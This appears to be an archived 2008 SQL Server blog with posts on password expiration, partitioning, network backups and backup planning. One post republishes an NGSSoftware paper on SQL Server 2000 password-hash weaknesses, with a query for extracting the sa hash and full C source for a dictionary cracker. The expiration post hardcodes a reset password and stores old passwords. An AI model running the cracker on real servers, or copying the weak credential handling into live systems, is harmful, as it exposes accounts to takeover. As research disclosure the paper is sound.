The SQL Toolbelt allows developers and DBAs to gain access to ALL the SQL Server tools we currently produce, including new releases. This means that when you are working with SQL Server databases, you can finally have the most powerful set of tools right there to hand, when you need them.
Whether you are a DBA or a developer, you benefit from using tools that help you work better. The SQL Toolbelt is the simplest and most effective way for you to access all the SQL Server tools that you need, to get your job done, the way you want to do it, and fast.
Products included in the SQL Toolbelt:

SQL Compare® Pro: compare and synchronize schemas
SQL Data Compare™ Pro: compare and synchronize data
SQL Packager™ Pro: package, upgrade, and install databases
SQL Prompt™ Pro: seamless IntelliSense-style code completion and layout
SQL Data Generator: automatically populate databases with realistic test data
SQL Dependency Tracker™: graphical impact analysis
SQL Refactor™: a host of smart refactorings on the fly
SQL Doc™ Pro: multiple database documentation
SQL Backup™ Pro**: compress and securely encrypt backups fast
SQL Multi Script™ Unlimited: execute multiple scripts against multiple SQL Servers with a single click
SQL Toolkit™: automate functionality with our APIs

With the SQL Toolbelt, you get it all in one go, once and for all, and you're set for the rest of the year.

Sunday, May 11, 2008

Implement password expiration dates for SQL Server 2000

Introduction

This article discusses a method that you can use to implement password expiration dates for Microsoft SQL Server logins. The method uses one user-created table and three stored procedures. This method is just one variation that you can use, and you can modify it to fit your own needs.

If you have Microsoft SQL Server running in Integrated Security mode under Microsoft Windows 2000 or a later version, you can rely on Windows for the expiration of the password. Whenever possible, we recommend that you use the Integrated Security mode for connections to SQL Server. Windows authentication helps provide security enforcement mechanisms such as stronger authentication protocols, and mandatory password complexity and expiration. The method discussed in this article applies to an instance of SQL Server that is running in mixed security mode.
1. Create a table in the master database that will hold the following:
•The user login ID.
•The date the password was last changed.
•The last password that was used.

Note: Only the system administrator (sa) should have access to this table.

CREATE TABLE PW_DATE
(
SID VARBINARY(85),
DATE DATETIME,
OLD_PW SYSNAME NULL
)

2. Create a stored procedure that will determine whether the password has expired. If the password has expired, the procedure will then assign the login ID a new password, and the user must have the sa change it back. Additionally, you may also want to include other checks that you consider appropriate for your environment. The only two logins the procedure will not change the password for are the sa or the PROBE logins. The following example sets the password to expire after 30 days, and it lists all the users whose passwords have expired.

Note: Only the sa should have EXECUTE permission.

CREATE PROCEDURE SP_PASSWORD_CHECK
(@secret nvarchar(128))
AS
DECLARE @sid varbinary(85)
DECLARE @date datetime
DECLARE @name nvarchar(128)
DECLARE crsPW CURSOR FOR
SELECT SID, [DATE] FROM PW_DATE WHERE DATEADD(DAY, 30, PW_DATE.DATE) <= GETDATE()
OPEN crsPW
FETCH NEXT FROM crsPW INTO @sid, @date
WHILE (@@FETCH_STATUS = 0)
BEGIN
SELECT @name = [NAME] FROM syslogins
WHERE sid = @sid AND syslogins.[name] NOT IN ('sa', 'probe')
IF @@ROWCOUNT = 1
EXEC sp_password NULL, @secret, @name
FETCH NEXT FROM crsPW INTO @sid, @date
END
CLOSE crsPW
DEALLOCATE crsPW

3. Run the SP_PASSWORD_CHECK procedure nightly by using a Transact-SQL script that is similar to the following:
USE MASTER
GO
EXEC SP_PASSWORD_CHECK 'gulliver'
GO
To make the Transact-SQL script run nightly, add a Transact-SQL Script step to a New Job in SQL Server Agent, and then schedule the job to run nightly.
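A minimal sketch of that job setup using the standard msdb procedures (the job and schedule names are arbitrary):

USE msdb
GO
EXEC sp_add_job @job_name = 'Nightly password check'
EXEC sp_add_jobstep @job_name = 'Nightly password check',
@step_name = 'Run SP_PASSWORD_CHECK',
@subsystem = 'TSQL',
@database_name = 'master',
@command = 'EXEC SP_PASSWORD_CHECK ''gulliver'''
EXEC sp_add_jobschedule @job_name = 'Nightly password check',
@name = 'Nightly 1am', @freq_type = 4, @freq_interval = 1,
@active_start_time = 010000 -- 01:00:00 each day
EXEC sp_add_jobserver @job_name = 'Nightly password check'
GO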


4. Instead of using the SP_ADDLOGIN and the SP_PASSWORD stored procedures, you will use two new stored procedures. The SP_CORP_ADDLOGIN stored procedure replaces the SP_ADDLOGIN stored procedure, and the SP_CORP_PASSWORD stored procedure replaces the SP_PASSWORD stored procedure.

To make sure that the old procedures are not used, revoke execute permissions for both the SP_ADDLOGIN stored procedure and for the SP_PASSWORD stored procedure.
Note: You can modify the SP_ADDLOGIN and the SP_PASSWORD stored procedures. However, if you install an upgrade, make sure that you do not remove the SP_ADDLOGIN or the SP_PASSWORD stored procedures.
CREATE PROCEDURE SP_CORP_ADDLOGIN
@LOGIN_ID VARCHAR(30),
@PASSWD VARCHAR(30) = NULL,
@DEFDB VARCHAR(30) = NULL
AS
EXEC SP_ADDLOGIN @LOGIN_ID, @PASSWD, @DEFDB
INSERT INTO PW_DATE (SID, DATE, OLD_PW)
VALUES (SUSER_SID(@LOGIN_ID), GETDATE(), NULL)
GO



CREATE PROCEDURE SP_CORP_PASSWORD
@OLD VARCHAR(30) = NULL,
@NEW VARCHAR(30),
@LOGIN_ID VARCHAR(30) = NULL
AS
EXEC SP_PASSWORD @OLD, @NEW, @LOGIN_ID
IF (@LOGIN_ID IS NULL)
BEGIN
UPDATE PW_DATE SET DATE = GETDATE(), OLD_PW = @OLD WHERE SID = SUSER_SID()
END
ELSE
BEGIN
UPDATE PW_DATE SET DATE = GETDATE(), OLD_PW = @OLD WHERE SID = SUSER_SID(@LOGIN_ID)
END
GO
5. The final step is to initialize the system. If you have an active system with user login IDs, the sa should run the following query to load the PW_DATE table with the starting values:
INSERT INTO PW_DATE (SID, DATE, OLD_PW)
SELECT SYSLOGINS.SID, GETDATE(), SYSLOGINS.PASSWORD FROM SYSLOGINS
Now the system should be ready. You can vary this method to meet your own needs.

Saturday, May 10, 2008

Cracking Microsoft SQL Server Passwords


How does SQL Server store passwords?
SQL Server uses an undocumented function, pwdencrypt(), to produce a hash of the user's password, which is stored in the sysxlogins table of the master database. This is probably a fairly commonly known fact. What has not been published yet are the details of the pwdencrypt() function. This paper will discuss the function in detail and show some weaknesses in the way SQL Server stores the password hash. In fact, as we shall see later on, I should be saying 'password hashes'.
What does an SQL password hash look like?
Using Query Analyzer, or the SQL tool of your choice, run the following query:

select password from master.dbo.sysxlogins where name='sa'
You should get something that looks similar to the following returned.
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B
This is the hash of the 'sa' login's password on my machine.
What can we derive from pwdencrypt() about the hash?
Time
The query
select pwdencrypt('foo')
produces
0x0100544115053E881CA272490C324ECE22BF17DAF2AB96B1DC9A7EAB644BD218969D09FFB97F5035CF7142521576
but several seconds later repeating the query
select pwdencrypt('foo')
produces
0x0100D741861463DFFF7B5282BF4E5925057249C61A696ACB92F532819DC22ED6BE374591FAAF6C38A2EADAA57FDF
The two hashes are different and yet the input, ‘foo’, is the same. From this we can deduce that time must play an important part in the way password hashes are created and stored. The design reasons behind this will be such that if two people use the same password then their hashes will be different - thus disguising the fact that their passwords are the same.

CASE

Run the query
select pwdencrypt('AAAAAA')
which produces
0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A12C9CC9EF99C4769F819B
Now, we can note that there are probably two password hashes here. If you can't spot it immediately, let me break it down:
0x0100
84449305
43174C59CC918D34B6A12C9CC9EF99C4769F819B
43174C59CC918D34B6A12C9CC9EF99C4769F819B
As can be seen, the last 40 characters are the same as the penultimate 40 characters. This suggests that the password is stored twice. One of them is the normal case-sensitive password and the other is the upper-cased version of the password. This is not good, as anyone attempting to crack SQL passwords now has an easier job: rather than having to break a case-sensitive password, they need only go after the upper-cased version. This reduces the number of characters they need to attempt considerably.
From what we know already, that changes in time will produce a change in the hash, there must be something about time that makes the password hashes different, and this information must be readily available so that when someone attempts to log in, a comparison can be performed against the hash derived from the password they supply and the hash stored in the database. In the breakdown of results from pwdencrypt() above, the 84449305 portion is this piece of information. This number is derived in the following fashion. The time() C function is called and the result used as a seed passed to the srand() function. srand() sets a start point to be used for producing a series of (pseudo)random numbers. Once srand() is seeded, the rand() function is called to produce a pseudo-random number. This number is an integer; however, SQL Server converts it to a short and sets it aside. Let's call this number SN1. The rand() function is called again, producing another pseudo-random integer which, again, is converted into a short. Let's call this number SN2. SN1 and SN2 are joined to produce an integer, SN1 becoming the most significant part and SN2 the least significant part (SN1:SN2), to produce a salt. This salt is then used to obscure the password.
Hashing the password
The user's password is converted to its UNICODE version if not already in this form. The salt is then appended to the end. This is then passed to the crypt functions in advapi32.dll to produce a hash using the Secure Hashing Algorithm (SHA). The password is then converted to its upper-case form, the salt tacked onto the end, and another SHA hash is produced.
0x0100 Constant Header
84449305 Salt from two calls to rand()
43174C59CC918D34B6A12C9CC9EF99C4769F819B Case Sensitive SHA Hash
43174C59CC918D34B6A12C9CC9EF99C4769F819B Upper Case SHA Hash

The Authentication Process
When a user attempts to authenticate to SQL Server several things happen to do this. Firstly SQL Server examines the password entry for this user in the database and extracts the "salt" - 84449305 - in the example. This is then appended to the password the user supplies when attempting to log in and a SHA hash is produced. This hash is compared with the hash in the database and if they match the user is authenticated - and of course if the compare fails then the login attempt fails.
SQL Server Password Auditing
This is done in the same manner that SQL Server uses to authenticate users. Of course, by far the best thing to do first is to attempt to brute force the hash produced from the upper-cased version. Once this has been guessed, it is trivial to work out the case-sensitive password.
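As an aside, the undocumented companion function pwdcompare() can be used from T-SQL to test a guess directly against the stored hash, which is handy for quick password audits (a sketch; like pwdencrypt(), it is unsupported):

-- Flag logins whose password matches a given guess
select name from master.dbo.sysxlogins
where pwdcompare('password', password) = 1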
Source Code for a simple command line dictionary attack tool
/////////////////////////////////////////////////////////////////////////////////
//
// SQLCrackCl
//
// This will perform a dictionary attack against the
// upper-cased hash for a password. Once this
// has been discovered try all case variant to work
// out the case sensitive password.
//
// This code was written by David Litchfield of NGSSoftware Insight Security Research to
// demonstrate how Microsoft SQL Server 2000
// passwords can be attacked. This can be
// optimized considerably by not using the CryptoAPI.
//
// (Compile with VC++ and link with advapi32.lib
// Ensure the Platform SDK has been installed, too!)
//
//////////////////////////////////////////////////////////////////////////////////
#include <stdio.h>
#include <windows.h>
#include <wincrypt.h>
FILE *fd=NULL;
char *lerr = "\nLength Error!\n";
int wd=0;
int OpenPasswordFile(char *pwdfile);
int CrackPassword(char *hash);
int main(int argc, char *argv[])
{
int err = 0;
if(argc !=3)
{
printf("\n\n*** SQLCrack *** \n\n");
printf("C:\\>%s hash passwd-file\n\n",argv[0]);
printf("David Litchfield (david@ngssoftware.com)\n");
printf("24th June 2002\n");
return 0;
}
err = OpenPasswordFile(argv[2]);
if(err !=0)
{
return printf("\nThere was an error opening the password file %s\n",argv[2]);
}
err = CrackPassword(argv[1]);
fclose(fd);
printf("\n\n%d",wd);
return 0;
}
int OpenPasswordFile(char *pwdfile)
{
fd = fopen(pwdfile,"r");
if(fd)
return 0;
else
return 1;
}
int CrackPassword(char *hash)
{
char phash[100]="";
char pheader[8]="";
char pkey[12]="";
char pnorm[44]="";
char pucase[44]="";
char pucfirst[8]="";
char wttf[44]="";
char uwttf[100]="";
char *wp=NULL;
char *ptr=NULL;
int cnt = 0;
int count = 0;
unsigned int key=0;
unsigned int t=0;
unsigned int address = 0;
unsigned char cmp=0;
unsigned char x=0;
HCRYPTPROV hProv=0;
HCRYPTHASH hHash;
DWORD hl=100;
unsigned char szhash[100]="";
int len=0;
if(strlen(hash) !=94)
{
return printf("\nThe password hash is too short!\n");
}
if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
{
hash = hash + 2;
strncpy(pheader,hash,4);
printf("\nHeader\t\t: %s",pheader);
if(strlen(pheader)!=4)
return printf("%s",lerr);
hash = hash + 4;
strncpy(pkey,hash,8);
printf("\nRand key\t: %s",pkey);
if(strlen(pkey)!=8)
return printf("%s",lerr);
hash = hash + 8;
strncpy(pnorm,hash,40);
printf("\nNormal\t\t: %s",pnorm);
if(strlen(pnorm)!=40)
return printf("%s",lerr);
hash = hash + 40;
strncpy(pucase,hash,40);
printf("\nUpper Case\t: %s",pucase);
if(strlen(pucase)!=40)
return printf("%s",lerr);
strncpy(pucfirst,pucase,2);
sscanf(pucfirst,"%x",&cmp);
}
else
{
return printf("The password hash has an invalid format!\n");
}
printf("\n\n Trying...\n");
if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL ,0))
{
if(GetLastError()==NTE_BAD_KEYSET)
{
// KeySet does not exist. So create a new keyset
if(!CryptAcquireContext(&hProv,
NULL,
NULL,
PROV_RSA_FULL,
CRYPT_NEWKEYSET ))
{
printf("FAILLLLLLL!!!");
return FALSE;
}
}
}
while(1)
{
// get a word to try from the file
ZeroMemory(wttf,44);
if(!fgets(wttf,40,fd))
return printf("\nEnd of password file. Didn't find the password.\n");
wd++;
len = strlen(wttf);
wttf[len-1]=0x00;
ZeroMemory(uwttf,84);
// Convert the word to UNICODE (the trailing newline was stripped above)
len--;
while(count < len)
{
uwttf[cnt]=wttf[count];
cnt++;
uwttf[cnt]=0x00;
cnt++;
count++;
}
// Append the four salt bytes after the UNICODE password
sscanf(pkey,"%x",&key);
wp = &uwttf[cnt];
t = key >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 8;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 16;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
t = key << 24;
t = t >> 24;
x = (unsigned char) t;
uwttf[cnt]=x;
cnt++;
// Create the hash
if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
{
printf("Error %x during CryptCreatHash!\n", GetLastError());
return 0;
}
if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
{
printf("Error %x during CryptHashData!\n", GetLastError());
return FALSE;
}
CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
// Test the first byte only. Much quicker.
if(szhash[0] == cmp)
{
// If first byte matches try the rest
ptr = pucase;
cnt = 1;
while(cnt < 20)
{
ptr = ptr + 2;
strncpy(pucfirst,ptr,2);
sscanf(pucfirst,"%x",&address);
if(szhash[cnt] == (unsigned char)address)
cnt++;
else
break;
}
if(cnt == 20)
{
// Every byte matched - we have found the password
printf("\nA MATCH!!! Password is %s\n",wttf);
return 0;
}
}
count = 0;
cnt = 0;
}
return 0;
}


NGSSoftware have created a GUI-based SQL password cracker that does not use the CryptoAPI and is, consequently, much faster.

Note: The above write-up has been taken from a document published by NGSSoftware, and all credit should be given to them.


Friday, May 9, 2008

SQL Server: Tuning Database Design

Partitioning Large Tables
Unless you follow some type of data archiving procedure in your OLTP applications, sooner or later your database tables become very large. Large is a relative term; as it applies to SQL Server tables, large means tables with ten million or more rows. Retrieving data from such tables will take longer than you'd want. Building proper indexes can help performance greatly; we'll discuss indexing strategies in a separate article. If nothing else works, partition the large table horizontally based on the record date, demographics, or some other characteristic. For instance, if you have a patient table containing many millions of records, you might want to split it into several tables based on the hospital where each patient was treated. If you have millions of patients per hospital, you can further split the tables based on the year when the patients were admitted to each hospital. Of course, doing so involves rewriting some queries and some DBA work for maintaining additional tables, but the performance benefits you gain will far outweigh the maintenance costs.
In addition to splitting large tables into several smaller tables, SQL Server 2000 supports Distributed Partitioned Views (DPVs), which spread the query-processing load over several servers. Note, though, that DPVs work only with the Enterprise and Developer Editions of SQL Server. See SQL Server Books On-Line for additional information about DPVs.
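To make the idea concrete, here is a minimal sketch of a local partitioned view, which is the same mechanism a DPV distributes across servers; the Patient_2003/Patient_2004 tables and their columns are hypothetical:

-- Member tables, one per year; the CHECK constraint on the partitioning
-- column lets the optimizer route queries to the right member table.
CREATE TABLE Patient_2003 (
    PatientID   INT NOT NULL,
    AdmitYear   INT NOT NULL CHECK (AdmitYear = 2003),
    PatientName VARCHAR(100) NOT NULL,
    PRIMARY KEY (AdmitYear, PatientID)
)
GO
CREATE TABLE Patient_2004 (
    PatientID   INT NOT NULL,
    AdmitYear   INT NOT NULL CHECK (AdmitYear = 2004),
    PatientName VARCHAR(100) NOT NULL,
    PRIMARY KEY (AdmitYear, PatientID)
)
GO
-- The view presents the member tables as one logical table.
CREATE VIEW Patient AS
SELECT PatientID, AdmitYear, PatientName FROM Patient_2003
UNION ALL
SELECT PatientID, AdmitYear, PatientName FROM Patient_2004
GO
-- A query that filters on the partitioning column touches only one member table.
SELECT PatientName FROM Patient WHERE AdmitYear = 2004 AND PatientID = 42

Because the CHECK constraints don't overlap and the partitioning column is part of each primary key, the view is also updatable, so existing INSERT/UPDATE code can keep targeting the view.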
Some of your queries can benefit from vertical partitioning as well. If most of your queries affect 5 out of 100 columns of your table, consider splitting the table into two tables with a one-to-one relationship. Having 100 columns in a single table is poor design for most business applications, but some applications have a business need to store a couple of hundred columns. If you're using the Enterprise Edition of SQL Server 2000, we recommend building an indexed view on such tables. You can create a view that contains the most frequently used columns, and build a unique clustered index on this view. The beauty of an indexed view is that SQL Server can take advantage of the index built on a view even if the query doesn't explicitly reference the view.
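For instance, an indexed view over the hot columns might be sketched as follows; the dbo.Orders table and its columns are hypothetical, and keep in mind that SQL Server 2000 also requires specific SET options (ANSI_NULLS, QUOTED_IDENTIFIER, and so on) to be in effect when the view and index are created:

-- The view must be schema-bound before it can be indexed.
CREATE VIEW dbo.OrderSummary
WITH SCHEMABINDING
AS
SELECT OrderID, CustomerID, OrderDate, Amount
FROM dbo.Orders
GO
-- The unique clustered index materializes the view on disk; on Enterprise
-- Edition the optimizer can use it even for queries against dbo.Orders.
CREATE UNIQUE CLUSTERED INDEX IX_OrderSummary ON dbo.OrderSummary (OrderID)
GO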

SQL 2000: Backup to UNC name using Database Maintenance Wizard

HowTo: Backup to UNC name using Database Maintenance Wizard

SUMMARY
SQL Server 2000 Books On-Line states that the Database Maintenance Plan Wizard only supports backups to local disks. However, backups can be made to a network resource under certain circumstances.

RESOLUTION
Backups to a network folder require the following prerequisites:
1) The SQL Server service must be running under a domain-level account.
2) The SQL Server service account must have FULL CONTROL rights to the file system folder and to the share.
3) The remote share should only be accessed via its UNC name; mapped drives may not be consistently visible to the SQL Server service.
Once these prerequisites are met, the UNC name can be typed into the 'Use this directory' text field on the 'Complete Backup' and/or 'Transaction Log Backup' tabs of the Database Maintenance Plan. SQL Server will then write backups to this location. Do not use the '…' button; it only enumerates local disk resources.
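The same prerequisites apply if you back up from Transact-SQL rather than the wizard; a quick way to confirm the service account can write to the share is a one-off backup such as the following (the share path is hypothetical):

-- BACKUP accepts a UNC path directly; the SQL Server service account
-- needs FULL CONTROL on both the share and the underlying folder.
BACKUP DATABASE Northwind
TO DISK = '\\backupserver\sqlbackups\Northwind_full.bak'
WITH INIT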

MORE INFORMATION
The most common failure cause is incorrect access permissions to the share or the underlying folder(s). Access to the share can be tested by logging into the console of the SQL Server as the SQL Service account. Test using the UNC share name only and not a mapped drive. Note that backing up to a network share can cause significant network traffic. Make sure your network can handle this load without adversely affecting other systems or end users. You may find it beneficial to establish a dedicated physical network connection between your database server and your backup file host.
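If xp_cmdshell is available to you, you can also check that the share is visible under the service account's credentials from inside SQL Server (share name again hypothetical):

-- Runs under the SQL Server service account, so it exercises the same
-- credentials the backup job will use.
EXEC master..xp_cmdshell 'dir \\backupserver\sqlbackups'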

SQL Server 2000 Administrator's Pocket Consultant: Database Backup and Recovery

SQL Server 2000 Administrator's Pocket Consultant: Database Backup and Recovery.

Information is the fuel that drives the enterprise, and the most critical information is often stored in databases. Databases are where you'll find an organization's customer account information, partner directories, product knowledge base, and other important data. To protect an organization's data and to ensure the availability of its databases, you need a solid database backup and recovery plan.
Backing up databases can protect against accidental loss of data, database corruption, hardware failures, and even natural disasters. It's your job as a database administrator to perform backups and store them in a safe and secure location.


Creating a Backup and Recovery Plan
Creating and implementing a backup and recovery plan is one of your most important duties as a database administrator. Think of database backup as an insurance plan for the future—and for your job. Important data is accidentally deleted all the time. Mission-critical data can become corrupt. Natural disasters can leave your office in ruins. With a solid backup and recovery plan you can recover from any of these situations. Without one, you're left with nothing to fall back on.
Initial Backup and Recovery Planning
Creating and implementing a backup and recovery plan takes time. You'll need to figure out which databases need to be backed up, how often the databases should be backed up, and more. To help you create a plan, consider the following:
  • What type of database are you backing up? System and user databases often have different backup and recovery needs. For example, the master database is essential for all Microsoft SQL Server operations. If the master database fails or becomes corrupt, it takes the whole server down with it. But you don't need to back up master every hour or every half hour—as you might have to do with a critical user database that handles real-time customer transactions. You need to back up master only after you create a database, change configuration values, configure SQL logons, or perform similar activities that make changes to the database.
  • How important is the data in the database? How you judge the data's importance can go a long way toward determining when and how you should back it up. While you may back up a development database weekly, you would probably back up a production database at least daily. The data's importance also drives your decision about the type of backup. With that development database, you'd probably do a full backup once a week. With an in-house customer order database that's updated throughout the weekday, you'd probably perform full backups twice a week and supplement this with daily differential backups and hourly backups for the transaction logs. You may even want to set named log marks that allow recovery up to a specific point of work.
  • How often are changes made to the database? The frequency of change can drive your decision about how often the database should be backed up. Because a read-only database doesn't ordinarily change, it doesn't need to be backed up regularly. On the other hand, a database that's updated nightly should be backed up after the nightly changes are posted. A database that's updated around the clock should be backed up continually.
  • How quickly do you need to recover the data? It's important to consider time when you create a backup plan. For mission-critical databases, you may need to get the database back online swiftly; to do this, you may need to alter your backup plan. Instead of backing up to tape, you may want to back up to disk drives or use multiple backup devices. Both options are much faster than restoring from a single tape device.
  • Do you have the equipment to perform backup? You need backup hardware to perform backups. If you don't have the hardware, you can't perform backups. To perform timely backups, you may need several backup devices and several sets of backup media. Backup hardware includes a tape drive, optical drives, removable disk drives, and plain old disk drives. Generally, tape drives are less expensive but slower than other types of drives.
  • What's the best time to schedule backups? You'll want to schedule backups when database usage is as low as possible. This will speed the backup process. However, in the real world you can't always schedule backups for off-peak hours. So you'll need to carefully plan when key databases are backed up.
  • Do you need to store backups off-site? Storing copies of backup tapes off-site is essential to the recovery of your systems in the case of a natural disaster. In your off-site storage location, you should also include copies of the software you may need to install in order to restore operations on a new system.
    Backing up a database is a bit different from backing up a server or a workstation. This is primarily because you'll often need to combine all (or nearly all) of the available techniques to ensure that you can recover a database completely. The basic types of backups you can perform include
  • Complete database backups Perform a full backup of the database, including all objects, system tables, and data. When the backup starts, SQL Server copies everything in the database and also includes any needed portions of the transaction log as the backup is in progress. Because of this, you can use a complete backup to recover the complete state of the data in the database at the time the backup operation finishes.
  • Differential backups Designed to back up data that has changed since the last complete backup. Because you store only the changes, the backup is faster and you can perform it more often. As with complete backups, differential backups include needed portions of the transaction logs, which allow you to restore the database to the time when the backup operation finishes.
  • Tip You can use differential backups only in conjunction with complete backups, and you can't perform differential backups on the master database. Don't confuse differential backups with incremental backups. Differential backups record all changes since the last complete backup (which means the size of the differential backup grows over time). Incremental backups record changes since the most recent full or incremental backup (which means an incremental backup is usually much smaller than a full backup).
  • Transaction log backups Transaction logs are serial records of all database modifications and are used during recovery operations to commit completed transactions and to roll back uncompleted transactions. When you back up a transaction log, the backup stores the changes that have occurred since the last transaction log backup and then truncates the log, which clears out transactions that have been committed or aborted. Unlike complete and differential backups, transaction log backups record the state of the transaction log at the time the backup operation starts (not when it ends).
  • File and filegroup backups Allow you to back up database files and filegroups rather than the entire database. This is useful with large databases where, to save time, you want to back up individual files rather than the entire database. Many factors affect file and filegroup backups. When you use file and filegroup backups, you must back up the transaction log as well. Because of this dependency, you can't use this backup technique if Truncate Log On Checkpoint is enabled. Furthermore, if objects in the database span multiple files or filegroups, you must back up all the related files and filegroups at the same time.
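    In Transact-SQL, these backup types map to variations of the BACKUP statement; a rough sketch, with database, filegroup, and device names invented for illustration:

-- Complete database backup
BACKUP DATABASE Customer TO DISK = 'D:\Backup\Customer_full.bak' WITH INIT

-- Differential backup: only data changed since the last complete backup
BACKUP DATABASE Customer TO DISK = 'D:\Backup\Customer_diff.bak' WITH DIFFERENTIAL

-- Transaction log backup: saves log activity since the last log backup, then truncates the log
BACKUP LOG Customer TO DISK = 'D:\Backup\Customer_log.bak'

-- File/filegroup backup: back up one filegroup of a large database
BACKUP DATABASE Customer FILEGROUP = 'SECONDARY' TO DISK = 'D:\Backup\Customer_fg.bak'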
    SQL Server 2000 uses recovery models to help you plan backups. The types of databases you are backing up and the types of backups you perform drive the choices for recovery models. Three recovery models are available:
  • Simple The simple recovery model is designed for databases that need to be recovered to the point of the last backup. The backup strategy with this model should consist of full and differential backups. You cannot perform transaction log backups when the simple recovery model is enabled. SQL Server 2000 turns on the Truncate Log On Checkpoint option, which clears out inactive entries in the transaction log on checkpoint. Because this model clears out transaction logs, it is ideal for most system databases.
  • Full The full recovery model is designed for databases that need to be recovered to the point of failure or to a specific point in time. With this model all operations are logged, including bulk operations and bulk loading of data. The backup strategy with this model should include full, differential, and transaction log backups, or full and transaction log backups only.
  • Bulk-logged The bulk-logged recovery model reduces the log space usage yet retains most of the flexibility of the full recovery model. With this model, bulk operations and bulk loads are minimally logged and cannot be controlled on a per operation basis. You'll need to manually redo bulk operations and bulk loads if the database fails before you perform a full or differential backup. The backup strategy with this model should include full, differential, and transaction log backups, or full and transaction log backups only.
    Each database can have a different recovery model. By default, master, msdb, and tempdb use the simple recovery model, and the model database uses the full recovery model. Model is the template database for all new databases, so if you change the default setting all new databases for the database server instance use the new default model. You set the recovery model by completing the following steps:
  • If you plan to switch from bulk-logged recovery to simple recovery, perform a transaction log backup prior to making the change, and then change your backup strategy so that you no longer perform transaction log backups.
  • Start Enterprise Manager and then, in the left pane (Console Root), click the plus sign (+) next to the server group you want to work with.
  • Click the plus sign (+) next to the server you want to work with and then click the plus sign (+) next to the Databases folder.
  • Right-click the database you want to work with and then, from the shortcut menu, choose Properties. This displays the database's Properties dialog box.
  • Use the Model selection list on the Options tab to change the recovery model and then click OK.
  • If you switched from simple recovery to full or bulk-logged recovery, add transaction log backups to your backup strategy for the database.
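    Alternatively, if you prefer Query Analyzer to Enterprise Manager, the recovery model can be changed with ALTER DATABASE (the database name is illustrative):

-- Switch the Customer database to the full recovery model
ALTER DATABASE Customer SET RECOVERY FULL

-- Confirm the current setting
SELECT DATABASEPROPERTYEX('Customer', 'Recovery')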
    Planning for Backups of Replicated Databases
    Databases that are replicated present a special problem for backup and restore. This is primarily because the traditional database architecture is extended to include three server roles:

  • Publisher Servers that make data available for replication, track changes to data, and maintain other information about source databases.
  • Distributor Servers that distribute replicated data and store the distribution database.
  • Subscriber The destination servers for replication. They store the replicated data, receive updates, and in some cases can also make changes to data.
    Because of these roles, you'll need to use additional strategies for backing up and restoring replicated databases. For complete details see the section of the SQL Server Books Online entitled "Backing Up and Restoring Replication Databases." (Click Start, then Programs, then Microsoft SQL Server 2000, and then choose Books Online.)
    Planning for Backups of Very Large Databases
    When backing up and restoring very large databases, you may want to take advantage of parallel backup and restore. Parallel backup and restore allow SQL Server 2000 to use multiple threads to read and write data. This means SQL Server can read data from, and write data to, multiple data sources. Backup and restore use parallel input/output (I/O) in different ways:
  • Backup uses one thread per disk device to read data from the database when a database has files on several disk devices.
  • Restore uses one thread per disk device while it initializes a database that it's creating for the restore process, provided the database is defined with files on several disks.
  • Both backup and restore use one thread per backup device when a backup set is stored on multiple backup devices.
    As you can see from the previous list, to take advantage of parallel I/O you must implement your backup strategy so that databases use
  • Multiple disk drives for storing data
  • Multiple backup devices for backing up and restoring data
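    As a minimal sketch, a backup set striped across two devices, which gives both backup and restore one thread per device, might look like this (database name and paths are hypothetical):

-- One backup set spread over two disk devices, ideally on separate spindles
BACKUP DATABASE Customer
TO DISK = 'D:\Backup\Customer_stripe1.bak',
   DISK = 'E:\Backup\Customer_stripe2.bak'
WITH INIT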
    Once you determine the backup operations you'll use on each database and how often you'll back up each database, you can select backup devices and media that meet these requirements. The next section covers backup devices and media.

    Selecting Backup Devices and Media
    Many different solutions are available for backing up data. Some are fast and expensive. Others are slow but very reliable. The backup solution that's right for your organization depends on many factors, including
  • Capacity The amount of data that you need to back up on a routine basis. Can the backup hardware support the required load given your time and resource constraints?
  • Reliability The reliability of the backup hardware and media. Can you afford to sacrifice reliability to meet budget or time needs?
  • Extensibility The extensibility of the backup solution. Will this solution meet your needs as your organization grows?
  • Speed The speed with which data can be backed up and recovered. Can you afford to sacrifice speed to reduce costs?
  • Cost The cost of the backup solution. Does the solution fit within your budget?
    Capacity, reliability, extensibility, speed, and cost are the issues that will influence your choice of a backup plan. If you determine the relative value of these issues to your organization, you'll be on the right track to selecting an appropriate backup solution. Some of the most commonly used backup solutions include
  • Tape drives Tape drives are the most common backup devices. They use magnetic tape cartridges to store data. Magnetic tapes are relatively inexpensive but aren't highly reliable. Tapes can break or stretch. They can also lose information over time. The average capacity of tape cartridges ranges from 100 MB to 2 GB. Compared with other backup solutions, tape drives are fairly slow. Still, the key selling point is the low cost of tape drives and magnetic tapes.
  • DAT drives DAT (digital audio tape) drives are quickly replacing standard tape drives as the preferred backup devices. DAT drives use 4-mm tapes and 8-mm tapes to store data. DAT drives and tapes are more expensive than standard tape drives and tapes, but they offer higher speed and more capacity. DAT drives that use 4-mm tapes typically can record over 30 MB per minute and have capacities of up to 16 GB. DAT drives that use 8-mm tapes typically can record more than 10 MB per minute and have capacities of up to 10 GB (with compression).
    Tip To perform faster backup and recovery operations, you can use multiple backup devices with SQL Server. For example, if it normally takes four hours to perform a full backup or restoration of the database, you can cut the backup and restoration time in half using two backup devices; with four backup devices you could fully back up or restore the database in an hour.
  • Autoloader tape systems Autoloader tape systems use a magazine of tapes that create extended backup volumes capable of meeting the high capacity needs of the enterprise. With an autoloader system, tapes within the magazine are automatically changed as needed during the backup or recovery process. Most autoloader tape systems use DAT tapes. The typical system uses magazines with between 4 and 12 tapes. The key drawback to these systems is the high cost.
  • Magnetic optical drives Magnetic optical drives combine magnetic tape technology with optical lasers to create a more reliable backup solution than DAT. Magnetic optical drives use 3.5-inch disks and 5.25-inch disks that look similar to floppies but are much thicker. Typically, magnetic optical disks have capacities of between 1 GB and 4 GB.
